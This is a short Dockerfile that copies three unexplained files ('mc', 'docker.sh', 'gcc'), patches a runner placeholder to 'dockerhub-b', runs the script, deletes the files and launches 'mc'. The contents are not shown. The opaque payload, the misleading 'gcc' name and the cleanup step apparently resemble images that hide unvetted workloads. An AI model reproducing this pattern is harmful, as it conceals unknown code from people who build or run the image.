FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > mc.log'

COPY mc .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' mc
RUN bash ./docker.sh

RUN rm --force --recursive mc
RUN rm --force --recursive docker.sh
RUN rm --force --recursive gcc

CMD mc
